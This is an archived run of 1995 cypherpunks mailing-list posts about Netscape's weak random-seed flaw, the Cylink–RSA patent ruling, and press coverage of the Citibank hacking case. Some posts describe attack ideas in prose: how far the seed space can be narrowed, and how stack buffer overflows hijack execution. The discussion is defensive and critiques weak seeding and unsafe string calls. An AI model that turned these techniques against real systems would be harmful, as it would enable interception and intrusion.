First of all, let me commend you for your honesty and forthrightness in owning up to the problem. I applaud it both as a cypherpunk and as one of the guys at Intergraph who pushed really hard to get an OEM agreement with NCC.

> If the Navigator is running on a Mac or PC, then the two seeds are
> the current time and the "tick count", which is milliseconds since starting
> windows for the PC version, and some time unit since booting on the Mac.

The Mac tick unit is 1/60th of a second, and TickCount() returns the number of ticks since the system was booted. I think you could safely narrow the range down to between 0 and (3600 * 24 * 60 =) 5,184,000, or about 24 bits. That's better than on the Unix boxes, but not insurmountable.

> This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we support. We are looking at stuff that
> is system dependent, user dependent, hardware dependent, random external
> sources such as the network and the user. If anyone has specific
> suggestions I would love to hear them so that we can do a better job.

I wouldn't consider the network to be suitably random. How many of your users are using Netscape over high-latency, low-speed 14.4 PPP/SLIP links? A lot, I'd bet. Not much good-quality randomness there.
> > "Netscape has also begun to engage an external group of world-class
> > security experts who will review our solution to this problem before
> > it is sent to customers."
> >
> > A group which offered to review the first version, but
> > Netscape refused.
> Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net? I think that it
> is unrealistic to expect us to release all of our source code to the
> net.

Unrealistic to expect, yes. Unreasonable to ask? Maybe not.

> I realize that some cypherpunks think that we should make all of
> our code publicly available. In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc... Don't expect to see us posting our entire security
> library source code to cypherpunks.

That's probably not the most likely thing -- but why not allow people with some security & crypto background _from this list_ see the code, under NDA, for review? Jim Gillogly, Hal Finney, and several others have shown a past talent for that sort of thing. Frankly, a signed message from, say, Hal saying "I've looked over the code and it looks pretty good" would carry a lot of water with me. In turn, I could communicate my warm fuzzy feeling to the dozen or so people that asked me about the security flaw yesterday, including our network ops guy.

Cheers,
- -Paul

- --
Paul Robichaux, KD4JZG      | "Things are much simpler and less stressful
perobich at ingr.com           | when you don't look to the law to fix things."
Not speaking for Intergraph | - Tim May (tcmay at got.net) on cypherpunks
Be a cryptography user. Ask me how.
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGANAafb4pLe9tolAQH+uQP7B7XvqVGnN4rDnSNth2PyVio5W5CpuA2U DgWwjV1DqPJCzA4BmM3/rRlYYG8Z2d50i5zb0XD6XbMi6bpkc9fGBZ6156p7sKa1 DDk8hWAr+BvIcuYTC2irRTee7462YBjsBvwOiFVV+0/Wdbg2gjGfPgcmsxmzqi4R Tby1/d2Pr6c= =xm2W -----END PGP SIGNATURE----- From rah at shipwright.com Wed Sep 20 06:12:57 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 20 Sep 95 06:12:57 PDT Subject: Conference: WORLDWIDE ELECTRONIC COMMERCE Message-ID: --- begin forwarded text Date: Wed, 20 Sep 1995 06:03:04 +0059 (EDT) From: Michael S Baum Subject: Re: BSDC Update 1.2 To: Robert Hettinga Mime-Version: 1.0 Robert, Can you please consider letting your Boston list (or other lists) know about the following. Thanks. ---------------- ANNOUNCING: The Second Annual . . . WORLDWIDE ELECTRONIC COMMERCE Law, Policy, Security & Controls Conference October 18-20, 1995 At the Hyatt Regency Bethesda Phone: (214) 516-4900 The Second Annual WorldWide Electronic Commerce; Law, Policy, Security and Controls conference is fast approaching. This important event will feature the world's foremost experts addressing the most important issues of implementation and control related to secure electronic commerce. It will focus on current problems and provide a foundation for dealing with the emerging problems that promise to make the future more complex. We have been fortunate in securing a faculty that is unusually qualified and internationally recognized who will share their experience, knowledge and theories on the wide range of issues being addressed by this program. We are equally pleased to have obtained affiliation for this conference of a number of prestigious and influential organizations. Please join us and your colleagues at this unique event! Michael S. Baum, J.D., M.B.A. 
Conference Chair Provided in Affiliation with: ============================================= * American Bar Association Section of Science and Technology Information Security Committee * University of London Queen Mary & Westfield College Centre for Commercial Law Studies * EDI Association of the United Kingdom * Harvard Law School * International Union of Latin Notaries * International Chamber of Commerce, Paris * National Institute of Standards and Technology (NIST) * Software Publishers Association * United Nations Commission on International Trade Law (UNCITRAL) * U.S. Council of International Business ============================================= Keynote Speaker: ---------------- Dr. Vinton G. Cerf, Ph.D. Senior Vice President MCI Telecommunications Corp. CONFERENCE PROGRAM ...at a glance GENERAL SCHEDULE ------------------------------------------------- Wednesday, October 19, 1995 6:00pm - 7:30pm SECURE ELECTRONIC COMMERCE FOR THE BEGINNER Thursday, October 20, 1995 8:00am - 9:00am Welcome & Keynote Speech 9:00am - 5:50pm Sessions 1 - 5 Friday, October 21, 1995 8:00am - 4:50pm Sessions 6 - 10 ---------------------------------------------- TRACK - A AGREEMENTS, LEGISLATION, POLICY AND REGULATION ---------------------------------------------- Session 1 So Who's in Charge, Anyway? The Impact of National & Int'l Leadership & Initiatives in Secure EC SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor Sally Katzen, Office of Management and Budget Bruce McConnell, Office of Management & Budget Renaud Sorieul, Esq., UNCITRAL Session 2 Drafting Agreements for Secure Electronic Commerce SPEAKERS: Michael S Baum, Esq., Independent Monitoring Thomas J Smedinghoff, Esq., McBride Baker & Coles Joe Wackerman, Esq., United States Postal Service Session 3 Are Privacy Requirements Inhibiting Electronic Commerce? SPEAKERS: Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti Prof. 
George Trubow, The John Marshall Law School Ian Walden, Ph.D., Commission of the European Communities Session 4 Alternative Methods of Signing: Legal Aspects of the IRS's July 1995 Regulation SPEAKERS: Tom Baker, Esq., Internal Revenue Service Lynn Casimir, Esq., Internal Revenue Service Celia Gabrysh, Esq., Internal Revenue Service Session 5 Digital Signature Legislation and Electronic Commerce SPEAKERS: Alan Asay, Esq., Utah Department of Commerce Kirk W Dillard, Esq., State Senator, State of Illinois Dean Sutherland, State Senator, Washington State William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature Session 6 The Legal Status and Effect of Digital Signatures - Perspectives SPEAKERS: Prof. Mads Andersen, University of Copenhagen Mario Miccoli, International Union of Latin Notaries Session 7 On-Line Registration vs. In-Person Registration: What Satisfies Business and Legal Requirements? SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology Jeff Treuhaft, Netscape Communications Corporation Peter Williams, Verisign Session 8 Antitrust in Electronic Commerce: Shopping, Payments & Certification Authorities SPEAKERS: Prof. Mads Andersen, University of Copenhagen John Greanley, Esq., US Department of Justice, Antitrust Division Session 9 Proving Secure Computer-Based Transactions: Evidence Revisited SPEAKERS: Margaret A Berger, Brooklyn Law School Charles Nesson, Harvard Law School Ian Walden, Ph.D., Commission of the European Communities Session 10 Third Party Service Providers & Certification Authorities - Can They Successfully Limit their Liability SPEAKERS: Bruce Hunter, Esq., General Electric Information Services Ellen Kirsh, Esq., America On Line Renaud Sorieul, Esq., UNCITRAL -------------------- TRACK - B INFORMATION SECURITY -------------------- Session 1 Requirements for Implementing Reasonable Security Procedures SPEAKERS: Robert Daniels, Esq., U.S. 
Social Security Administration Dain Gary, Morgan Stanley Allan M Shiffman, Terisa Systems, Inc. Session 2 Information Security Standards: Policy, Coordination & Interoperability SPEAKERS: Marty Ferris, US Department of Treasury Hoyt Kesterson II, Bull Worldwide Information Systems Peter Landrock, Ph.D., CRYPTOMATHIC David Solo, Bolt, Beranek and Newman Session 3 Who's Really on the Other End: Identification Technologies and Nonrepudiation SPEAKERS: Benjamin Miller, Personal Identification News John E Siedlarz, IriScan, Inc. William Sweet, National Semiconductor Session 4 Security and Security Policy in Internet-based Payments Systems SPEAKERS: Marty Ferris, US Department of Treasury Tim Jones, Mondex Anne Wallace, US Department of Treasury Session 5 When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce SPEAKERS: Prof. Michael Froomkin, University of Miami School of Law Jeff Greiveldinger, US Department of Justice, Criminal Div. Frank W Sudia, Bankers Trust Company Session 6 Comparing Critical Cryptographic Algorithms, Protocols, and Standards to Enable Secure Electronic Commerce SPEAKERS: Peter Landrock, Ph.D., CRYPTOMATHIC Ron Rivest, Massachusetts Institute of Technology Miles E Smid, National Institute of Standards & Tech. Session 7 Export Controls & Transborder Data Flows: Is Secure Electronic Commerce in Jeopardy? SPEAKERS: James Bidzos, RSA Data Security Renee H Danckwerth, Export Consultant Session 8 'Certificates-R-US': Trust Models and the Developing Secure Information Infrastructure SPEAKERS: Warwick Ford, Bell-Northern Research Sead Muftic, COST Computer Security Technologies Peter Williams, Verisign Session 9 Professional Accreditation and Certification - The New Frontier in 'Remote Trust' SPEAKERS: Richard C Koenig, Int'l Info. Sys. Security Cert. Consort. Alan M Schwartz, Esq., American Bar Association Session 10 Looking into the Crystal Ball: Certificates Revisited SPEAKERS: Web Augustine, VeriSign, Inc. 
Warwick Ford, Bell-Northern Research Hoyt Kesterson II, Bull Worldwide Information Systems ------------------------------------------- TRACK - C LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE ------------------------------------------- Session 1 Do Criminal Laws Really Protect Electronic Commerce? SPEAKERS: Scott Charney, Esq., US Department of Justice William J Cook, Brinks, et al. Richard A Ress, Federal Bureau of Investigation Session 2 Who Owns the Information, Standards, Certificates and Cryptographic Keys? SPEAKERS: Peter Harter, National Public Telecomputing Network David W Maher, Esq., Sonnenschein Nath & Rosenthal James Powers, Esq., Shulman, Rogers et. al Session 3 Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking Ray Nimmer, Esq., Weil, Gotshal & Manges Session 4 Electronic Licensing and Distribution of Digital Content: Downloading for Liability? SPEAKERS: James C McKay, Jr., Office of the Corporation Counsel, D.C. Thomas J Smedinghoff, Esq., McBride Baker & Coles Mark Traphagen, Software Publishers Association. Session 5 Insuring Electronic Commerce Transactions and Infrastructure SPEAKERS: Andrew Cockrane, Alexander & Alexander Norman R Nelson, New York Clearing House Association Session 6 Auditing a Third Party/Value Added Network or Certification Authority (and Its Implications) SPEAKERS: Charles H LeGrand, CIA, Institute of Internal Auditors John Stelzer, COMMERCE:Institute Session 7 Electronic Recordkeeping - What to Save, When and How to Save It, and for How Long SPEAKERS: Lynn Casimir, Esq., Internal Revenue Service Celia Gabrysh, Esq., Internal Revenue Service Claude Perreault, Chambre des notaires du Quebec Session 8 Disaster and Contingency Planning Services: What is Needed for EC and Certification Authorities SPEAKERS: Dain Gary, Morgan Stanley Ake Nilson, Marinade Limited Helena Roine-Taylor, The Finnish Data Communication Assoc. 
FINPRO David Solo, Bolt, Beranek and Newman Session 9 General Counsel's Forum on Computer-Based Trade SPEAKERS: Robert W Barger, Esq., AT&T Bruce Hunter, Esq., General Electric Information Services Ellen Kirsh, Esq., America On Line Session 10 An Audit Model for Your Electronic Commerce Infrastructure SPEAKERS: Gerald R Bielfeldt, NationsBank Phillip Oddo, Ciba-Geigy Horton Sorkin, Ph.D., Howard University ------------------------------ TRACK - D INFRASTRUCTURAL CONSIDERATIONS ------------------------------ Session 1 Securely Shopping on the Web: New Paradigms, Protocols and Opportunities SPEAKERS: Jeff Hilt, VISA International Todd Ostrander, Egghead Software Session 2 What can Trusted Third Parties and Certification Authorities Learn from the Financial Clearinghouses SPEAKERS: Carol Barrett, Federal Reserve Bank of New York Bill Nelson, National Automated Clearinghouse Associa Norman R Nelson, New York Clearing House Association Session 3 Electronically 'Gluing' Computer-based Records SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology Allan M Shiffman, Terisa Systems, Inc. Session 4 Global Registries for Secure Electronic Commerce SPEAKERS: Jonathan Allen, Barum Computer Consultants Michel Peereman, Federation Nationale des Chambres Peter Robinson, US Council for International Business Session 5 Computer-based Negotiability: What is Needed to Make it Work SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor James E Byrne, James Mason University Law School Ake Nilson, Marinade Limited Session 6 Time/Date Stamping of Digital Information: Necessities & Options SPEAKERS: Richard Rothwell, United States Postal Service Scott Stornetta, Surety Technologies, Inc. Session 7 Will Healthcare-related Electronic Commerce Require Special Controls and Secure Infrastructures? 
SPEAKERS: Kathleen Frawley, J.D., M.S., R.R.A, AHIMA Daniel J O'Shea, National Computer Claims Service Session 8 The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm) SPEAKERS: Theodore S Barassi, Esq., US Council for International Business Mario Miccoli, International Union of Latin Notaries Session 9 Electronic Cash and Novel Electronic Commerce Payments Systems SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking Ron Rivest, Massachusetts Institute of Technology Marvin Sirbu, Carnegie-Mellon University Session 10 Why does Everyone Want to be a Trusted Third Party/Certification Authority (at Least Initially)? SPEAKERS: Sead Muftic, COST Computer Security Technologies Stratton D Sclavos, VeriSign, Inc. ----------------------------------------------------------------- TO REGISTER: ------------- Price: $550.00 (U.S.) Name: Title: First Name for Badge: Company/Organization: Address: City/State/Prov/Zip/Postal code: Country: Telephone: Fax: E-Mail: Check One: ========== [ ] I am Mailing a check in the amount of $______ [ ] I wish to charge this to a credit card (fax or mail only) [ ] American Express [ ] Visa [ ] MasterCard Card Number: Expiration Date: Name on Card: Signature (fax or mail): ----------------------------------------------------------------- HOTEL RESERVATIONS: A special conference rate of $129 has been arranged for our attendees. 
To make arrangements, please call the Hyatt Regency Bethesda at (301) 657-1234 Hyatt Regency Bethesda One Bethesda Metro Center Bethesda, MD 20814 ----------------------------------------------------------------- For more information or a complete program brochure and schedule, contact the conference coordinators as shown below: HOW TO CONTACT US ================= E-Mail: wec at multicorp.com Phone: (214) 516-4900 Fax: (214) 424-0562 Mail: Worldwide Electronic Commerce PO Box 743485 Dallas, TX 75374 =============================================== --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rmartin at aw.sgi.com Wed Sep 20 06:16:09 1995 From: rmartin at aw.sgi.com (Richard Martin) Date: Wed, 20 Sep 95 06:16:09 PDT Subject: `Random' seed. Message-ID: <9509200915.ZM14792@glacius.alias.com> Vaporware which I heard around CFP '95, and have been sort of wondering about ever since... Someone told me that someone else [possibly Matt Blaze] had been looking at how much randomness could be got by forking two child processes which would just run as asynchronous clocks: whenever the parent program needs a little `random' bit, it queries both and gives (clock(A) + clock(B) % 2) or something. Questions about this [to the list]: * who has done any [the?] work on this? * was it found to be useful/good or not? * what would be the drawbacks to adding this [Yet Another Source Of Entropy] to the Netscape scheme? 
frodo =) -- Richard Martin Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 From koontz at MasPar.COM Wed Sep 20 06:20:52 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Wed, 20 Sep 95 06:20:52 PDT Subject: NSA and Netscape Crack Message-ID: <9509201325.AA24783@argosy.MasPar.COM> >>"I'm from the NSA, I'm here to help your crypto..." The quote should be "I'n form the NSA, I'm here to help your crypto. You have where else to go!" (apologies to George Lucas) From perry at piermont.com Wed Sep 20 06:29:32 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 06:29:32 PDT Subject: Cylink In-Reply-To: <9509192145.AA01100@ch1d157nwk> Message-ID: <199509201328.JAA04874@frankenstein.piermont.com> Andrew Loewenstern writes: > > The arbitrators ruled that RSA hasn't had the right to sublicense > > the Stanford patents since 1990. > > > > Cylink said it would seek royalties from companies that have licensed > > software code from RSA and are redistributing it, arguing that they > > are infringing the Stanford patents. > > hahahaha, this is funny if it's true... Anyone know which two patents they > are referring to? (diffie-hellman and merkle-hellman?) > > Any ideas on how this will change the legal status of RSAREF and PGP? I'm much more interested in how this changes the legal status of the D-H derived encryption systems like ElGamal, and how it alters the patent status on the DSS, which is basically also derived from the same root. Perry From koontz at MasPar.COM Wed Sep 20 06:33:39 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Wed, 20 Sep 95 06:33:39 PDT Subject: NSA and Netscape Crack Message-ID: <9509201337.AA24843@argosy.MasPar.COM> >"I'n form the NSA, I'm here to help your crypto. You have where else >to go!" I've never seen something transformed so. 
Talk about munging characters. I'm surprised there are no control characters in this. What was meant: "I'm from the NSA, I'm here to help your crypto." "You have no where else to go!" (as said by a seven foot robot cop in black leather). (and it wasn't even over a MODEM) From paul at poboy.b17c.ingr.com Wed Sep 20 06:55:15 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Wed, 20 Sep 95 06:55:15 PDT Subject: Cylink In-Reply-To: <199509201328.JAA04874@frankenstein.piermont.com> Message-ID: <199509201343.AA12329@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > Andrew Loewenstern writes: > > Any ideas on how this will change the legal status of RSAREF and PGP? Then Perry Metzger replied: > I'm much more interested in how this changes the legal status of the > D-H derived encryption systems like ElGamal, and how it alters the > patent status on the DSS, which is basically also derived from the > same root. What I'm waiting to see is who sues RSADSI for recovery of royalties paid to Cylink. Imagine how Apple, Lotus, and all of the other bigcorps using RSA must feel right about now: they licensed a patent from the wrong people, and it appears that RSADSI may have known that their rights had expired. What about Roger Schlafly's suit? Anything new on it? - -Paul - -- Paul Robichaux, KD4JZG | "Things are much simpler and less stressful perobich at ingr.com | when you don't look to the law to fix things." Not speaking for Intergraph | - Tim May (tcmay at got.net) on cypherpunks Be a cryptography user. Ask me how. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGAajKfb4pLe9tolAQG8dwP+Mt8frNZVf87eQOlpIGZ0V7fJDD1CoLSg 6yt6inPeTcjUK52rYLV4ut2hm2q7yASsGi2PlXm+oXh9gi5rCjCNClR8ffRI/f3Z PklwDT+KYm9XB9pJfDPJXzVf9jevY7Ge+m4QBFWymXiQ3DLhsu+Mh8kijTO47uJ9 rZHjHPFjBEo= =UAqt -----END PGP SIGNATURE----- From perry at piermont.com Wed Sep 20 07:05:47 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Wed, 20 Sep 95 07:05:47 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509200403.AAA14189@clark.net> Message-ID: <199509201405.KAA04961@frankenstein.piermont.com> Ray Cromwell writes: > > > > > > Sigh. For your information the security code for 1.x versions of > > > netscape was not even written by someone from NCSA. > > > > If there is ANY place in the code that I can do a data driven buffer > > overflow, I can force you to execute code that I supply. I don't give > > a damn if it's in the "security" code. It makes no difference where it > > is. If there is a chink, that's it -- you're meat. > > How would you do this if the buffer overflow happened in a buffer > which was allocated in a separate protected heap apart from stack > and executable data? You could do that, but that's not how C does things. C allocates these things on the stack. Overflow the buffer and you fandango on stack, allowing you to change where the program counter jumps to on subroutine exit, and allowing you to force your own machine code into the system for execution. I suspect that even were subroutine data allocated in a separate heap you could pull nasty tricks -- your protected heap probably has data in it that controls execution flow, so cleverness might still get you the same results. Perry From stevenw at iglou.com Wed Sep 20 07:13:13 1995 From: stevenw at iglou.com (Steven Weller) Date: Wed, 20 Sep 95 07:13:13 PDT Subject: Netscape sub rosa? Message-ID: >Gee, where's that "Cypherpunks logo" when you really need it? >From a PR standpoint, this is the best idea of the year. >A rose covering the Netscape "N" logo? A crypto eagle swooping down and >pecking at weak keys? How about a big 200 pin PGA chip with a jagged crack right across it? Implications of "broken" or "cracked", obviously technical/electronic, and echoes of Clipper. Throw some streams of ones and zeroes in the background for good measure. 
------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From nobody at REPLAY.COM Wed Sep 20 07:25:24 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 20 Sep 95 07:25:24 PDT Subject: Banks and Netscape InSec Message-ID: <199509201425.QAA22671@utopia.hacktic.nl> Financial Times, September 20, 1995, p. 12. Banks' Security Chains Failed The Citibank case has highlighted weaknesses in corporate security measures. By John Mason Could it happen to us? Banks have been soul-searching about their security systems in response to the alleged computer hacking fraud on Citibank, in which $10m (6.49m pounds) is said to have been removed from client accounts by a young Russian based in St Petersburg. In public, banks express confidence in their computer security. "It's a shame what happened at Citibank, but it couldn't happen here," is a typical response. However, some industry insiders are concerned that many banks and other commercial organisations are still leaving themselves dangerously open to attack by hackers. Rumours of some banks not admitting to similar breaches only increase doubts. The full technical picture of what allegedly happened at Citibank is unclear. The largest US bank, unsurprisingly, is reluctant to reveal precisely how Mr Vladimir Levin -- apparently without inside help -- allegedly breached its Wall Street security system from his personal computer in St Petersburg. A UK court will today decide whether to extradite Mr Levin to the US to face trial. It seems that Citibank was caught out by its technology, which could not match recent developments available to hackers. Citibank's main weakness is known to have been its use of "fixed passwords" to guard its computerised cash management system. 
This system, dubbed Citicorp Cash Manager, handles transactions totalling $500bn every day. Cash management systems which provide customers with access to their accounts so that they can make transfers, are inherently vulnerable to hackers because by definition they allow third-party access. In the case of Citibank, access to the cash management system could be made via telephone lines from anywhere in the world using a computer. Until the incident, Citibank's system used fixed or permanent passwords where the customer has only to enter a name and regular password to gain entry to the system. However, security experts now agree that this technology has been rendered ineffective at guarding high-risk systems by the proliferation of modem communications devices attached to powerful PCs providing access to the Internet. Hackers now have ready access to sophisticated software including "sniffers" -- programs used by network managers which allow them to look at and capture information on networks. These give hackers access to huge quantities of information -- including directories of passwords. The hackers can then take their pick of which password to use. With bank cash management systems, this virtually amounts to giving a hacker the choice of which client account to loot. There are a number of steps banks and other security-conscious computer network operators can take to defend themselves against unauthorised intruders. The main option -- and that introduced by Citibank since the Levin incident -- involves the use of encrypted passwords that can be used only once. A "smart card" issued to each customer contains a sequence of passwords so that a different one is used each time. This password is then encrypted or scrambled into a form that is, its manufacturers claim, unreadable to anyone "surfing" the Internet. The main computer then deciphers the signal and, able to recognise the sequence of changing passwords, lets the genuine user into the system. 
The chances of someone guessing one of Citibank's passwords are now one in 11m, says Mr Tom Brady of Enigma Logic of Concord, California, which supplies this technology to Citibank. The bank's previous fixed password technology, by contrast, meant breaking the password system was relatively straightforward, he says. Concern centres on how quickly banks and others have reacted to technological change. Although encryption technology has been available for more than 10 years, it is only now being generally introduced, and usually only for systems with external access. Barclays Bank introduced encryption for computer systems with external access before the Citibank incident occurred. Barclays now feels "fairly comfortable" about the state of its security, says Mr Philip Severs, deputy director of operational risk. However, it is clear that not every bank has closed the door yet. Mr Severs says the business world is just "on the cusp" of introducing encryption technology. Another security adviser says the measures of one leading US bank, based on both fixed and encrypted passwords, are still considered weak by experts. Another security specialist employed by a leading international bank says that senior management throughout the industry has sometimes been slow to react to change. "Sometimes people think that their security is adequate simply because it has not been breached in the past. At other times, head offices are warned of the dangers, but fail to act because of cost factors." Whatever the state of bank security, their experts agree that their customers' awareness of the problem is lower. "Whenever payments are made or orders placed electronically, then a threat exists. The banks are leading on this. Companies are some way behind," says Mr Severs. But encryption remains only one way of improving security. The alleged hacking incident at Citibank involved more than simply breaching the bank's password system. 
The US government claims Mr Levin was able to watch corporate clients making numerous transactions before deciding which account to take money from. He also allegedly spotted one security precaution in place and limited each of his withdrawals to under 200,000 pounds ($310,540). Citibank will not comment on its security measures other than to point to its "smart cards". However, the bank agrees that there was only partial use of another well-established security system -- "predefined" transfer routes. These allow customers to make transfers only to specific bank accounts making it impossible for a hacker to remove funds for himself. Citibank offers such an option. However, it is only useful to some customers. The average corporate customer might find it suitable because the number of destination accounts they need is limited. However, for financial institutions making transfers to many accounts, such a system is too cumbersome. Perhaps significantly, one of Mr Levin's alleged victims was an investment company. Citibank investigators say Mr Levin gave himself away by making a number of "amateurish" mistakes, but admit he was a very sophisticated computer operator, allegedly attempting a particularly elegant fraud. The bank concedes that it still does not fully understand all the technical aspects of how Mr Levin allegedly managed to break in. If and when he is extradited to the US and introduced to that country's plea bargaining system, he will be invited to explain further. Banking security experts agree that the Citibank episode shows that effective detection systems to track unusual transactions remain essential. In the Citibank case these worked well, enabling the attempted fraud to be nipped in the bud, monitored and losses kept to $400,000. But they agree that even if new technology is introduced, keeping one step ahead of the hackers all the time is just not possible. One with knowledge of the Citibank case comments: "At the end of the day it cannot be done. 
Essentially, security is about being reactive, not pro-active." Meanwhile, the Citibank episode provides the most public example yet of how hackers can threaten the integrity of the international banking system. And just as the Barings collapse prompted other banks to review their internal management controls, so Mr Levin's case is having a similar effect on computer security. But as one bank security expert says: "It takes an incident like this to prompt people to review their systems. Whether they take action however is a different matter." ----- Financial Times, September 20, 1995, p. 20. Netscape flaw may deal blow to Internet security By Louise Kehoe in San Francisco A security flaw in Netscape Communications' popular Internet software could deal a serious blow to companies planning to transact business on the Internet, the global computer network. The flaw, discovered by two computer science students at the University of California at Berkeley, means that financially sensitive data, such as credit card numbers, sent over the Internet using Netscape software could be vulnerable to computer hackers. "Security is the number one issue" that needs to be resolved if the Internet is to become a medium for large-scale electronic commerce, according to Ms Cathy Medich, executive director of CommerceNet, a consortium of companies that is developing standards and protocols for conducting business on the Internet with backing from the US government. The security breach is a setback for Netscape, raising concerns about the company's ability to produce reliable secure software. Netscape's so-called secure browsers are used by an estimated 66 per cent of people accessing the World Wide Web, the segment of the Internet where thousands of companies have set up electronic displays of their products. The software had been seen as a breakthrough for electronic commerce, enabling people to buy and sell goods online without fear of their messages being intercepted. 
Netscape confirmed that a security loophole has been identified, but said it would offer a free security "patch" by the end of this week on its World Wide Web page (http://home.netscape.com). No losses have been reported as a result of the security breach, Netscape said. This is the second time that Netscape's encryption has been "cracked". Last month, a computer expert in France was able to decode the weaker version of Netscape's cyphers, which the company is allowed to export. The security flaw found by the Berkeley students affects all current versions of Netscape software, including its browsers and server software, the company said. However, next week the company will begin trials of a new version of its browser, which will contain the security patch. ----- From aba at dcs.exeter.ac.uk Wed Sep 20 07:30:31 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Wed, 20 Sep 95 07:30:31 PDT Subject: Cylink Message-ID: <4454.9509201427@exe.dcs.exeter.ac.uk> Paul Robichaux writes: > Andrew Loewenstern writes: > > Any ideas on how this will change the legal status of RSAREF and PGP? > > Then Perry Metzger replied: > > I'm much more interested in how this changes the legal status of the > > D-H derived encryption systems like ElGamal, and how it alters the > > patent status on the DSS, which is basically also derived from the > > same root. > > What I'm waiting to see is who sues RSADSI for recovery of royalties > paid to Cylink. Imagine how Apple, Lotus, and all of the other > bigcorps using RSA must feel right about now: they licensed a patent > from the wrong people, and it appears that RSADSI may have known that > their rights had expired. It's sooo gratifying seeing the err, ever so slightly litigious folks from RSADSI get a dose of their own medicine. :-) Does it apply to RSA and hence PGP by way of RSAREF, and a claimed general patent on PK, or was this court decision on specific DH patents only? 
If so I hope the proud new owners have better marketing sense than to stomp on their huge advertisement of RSA, PGP.

Adam

From perry at piermont.com Wed Sep 20 07:37:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 07:37:07 PDT
Subject: netscape's response
In-Reply-To: <9509200254.ZM206@tofuhut>
Message-ID: <199509201436.KAA05021@frankenstein.piermont.com>

"Jeff Weinstein" writes:
> It turns out that Taher Elgamal and I started working here within
> a week of each other, about 6 months ago. Neither of us thought to
> take a serious look at the RNG seed code. I don't think that anyone
> would accuse Taher of being an amateur in this area.

Well, he is more of a math guy than a practical guy. For a long time, I've posted articles and have seen other people post articles arguing that the right place to attack systems like this is in spots like the random number generators.

Were I Netscape, I'd be conducting code reviews for lots of other things, too. Your coding standards should out and out ban the use, anywhere in your code, of sprintf, gets, strcat, or any other thing that manipulates strings without explicitly taking length limits. system and any similar calls should also be banned entirely. It doesn't matter if you "think" they are safe -- calls you don't use can't be somehow trickily abused.

I suspect, however, that the seductiveness of "oh, this looks safe enough" will probably continue to win out with your colleagues over systematic approaches to these problems. After all, they never seemed to learn the lesson in revision after revision of NCSA's stuff.

This is not to say that I think *you* are bad at this, Mr. Weinstein, but you certainly have colleagues with the worst possible track record.
Perry

From futplex at pseudonym.com Wed Sep 20 07:40:46 1995
From: futplex at pseudonym.com (Futplex)
Date: Wed, 20 Sep 95 07:40:46 PDT
Subject: USA Today on Fear of Credit Cards over Net
Message-ID: <9509201440.AA28932@cs.umass.edu>

USA Today reports in its 9/20/95 edition, on the front of the Money section, that "Few Feel Safe Making On-Line Transactions". A survey of 427 "computer users" by USA Today and Intelliquest yielded the results below.

[The article doesn't say whether the survey was conducted before or after news of the bad seeds hit. I only bought USA Today because my best friend gets her 15 minutes of fame below the fold on page 7D of the Life section today.]

I'm not sure exactly what "sending a credit-card number to a commercial on-line service" means. Apparently it's seen as slightly safer than phoning it in, but much riskier than snail-mailing it in to an ISP.

How much do PC users trust:

  Automatic teller machines                          77%
  Banking by phone                                   62%
  Banking by computer                                57%
  Using a credit card or calling
    card at a public phone                           57%
  Writing a credit-card number on
    a catalog order form                             43%
  Sending a credit-card number to
    a commercial on-line service                     34%
  Giving a credit-card number
    over the phone                                   31%
  Sending a credit-card number
    over the Internet                                 5%

  (margin of error = +/- 4.7%)

Raph also gets mentioned, mainly for "human interest" I'm afraid :/

  Even those familiar with the Internet do not routinely use it for financial transactions. Raph Levien -- a computer science Ph.D. candidate reached via Internet -- says he has only used his credit card once over the Internet. About a year ago, he bought three CDs: Best of Alan Parsons Project, Enya and Beethoven's Ninth. Levien is a member of the group cypherpunks, which announced on-line Sunday night that hackers found the security flaw in Netscape's software. Still, Levien says Netscape's system "is among the safest that there is."
-Futplex

From robl at on-ramp.ior.com Wed Sep 20 07:54:16 1995
From: robl at on-ramp.ior.com (Rob L)
Date: Wed, 20 Sep 95 07:54:16 PDT
Subject: [NOISE] Re: Cylink
In-Reply-To: <199509201343.AA12329@poboy.b17c.ingr.com>
Message-ID:

> What about Roger Schlafly's suit? Anything new on it?
